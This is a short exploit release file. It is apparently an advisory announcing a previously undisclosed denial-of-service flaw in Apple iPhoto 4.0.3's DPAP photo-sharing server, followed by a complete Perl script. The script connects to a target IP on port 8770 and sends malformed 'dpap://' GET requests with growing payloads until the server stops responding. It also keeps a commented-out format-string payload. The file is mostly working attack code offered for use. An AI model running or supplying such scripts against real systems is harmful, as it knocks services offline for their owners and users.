appleiphoto-dos.txt

`A little zero-day exploit in memory of Dude VanWinkle.  
  
Apple iPhoto v4.0.3 DPAP (Digital Photo Access Protocol) Server Denial   
of Service Exploit.  
  
Other versions may be vulnerable too; the current version should not   
be vulnerable.  
  
The server process catches the exception, exits cleanly, but does not   
restart.  
  
This exploits a previously undisclosed vulnerability.  
  
-David Wharton  
  
---  
  
#!/usr/bin/perl  
# crash the iPhoto DPAP (Digital Photo Access Protocol) Server on   
iPhoto 4.0.3  
# technically the server exits cleanly but it does not restart  
  
use IO::Socket::INET;  
  
die "Usage $0 <target_ip>\n" unless ($ARGV[0]);  
  
$| = 1;  
  
if ($ARGV[1]) {  
$port = $ARGV[1];  
} else {  
$port = 8770;  
}  
  
$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[0],  
PeerPort=>$port,  
Proto=>'tcp');  
  
if ($socket == NULL) {  
die "Cannot connect to $ARGV[0] on port $port\n";  
}  
  
  
$malformed_data = "AAAAAAAAAAAAAAA";  
#$malformed_data = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n";  
$count = 0;  
  
$msg="GET dpap://$malformed_data HTTP/1.1\r\n\r\n";  
print "Sending message:\n$msg\n";  
$socket->send($msg);  
$socket->close();  
sleep(1);  
$cont = 1;  
  
# this loop is unnecessary but who cares  
while ($cont && $count < 11) {  
$socket2 = new IO::Socket::INET->new(PeerAddr=>$ARGV[0],   
PeerPort=>$port, Proto=>'tcp');  
if ($socket2 == NULL) {  
$cont = 0;  
print "crash\n";  
} else {  
print ".";  
# next line not necessary but does the job too  
$malformed_data = $malformed_data.$malformed_data;  
$msg="GET dpap://$malformed_data HTTP/1.1\r\n\r\n";  
$socket2->send($msg);  
$count++;  
$socket2->close();  
sleep(1);  
}  
}  
  
if ($count < 10) {  
print "iPhotoDPAPServer on $ARGV[0] has been pwn3d\n";  
} else {  
print "Unable to crash iPhotoDPAPServer on $ARGV[0]\n";  
}  
  
`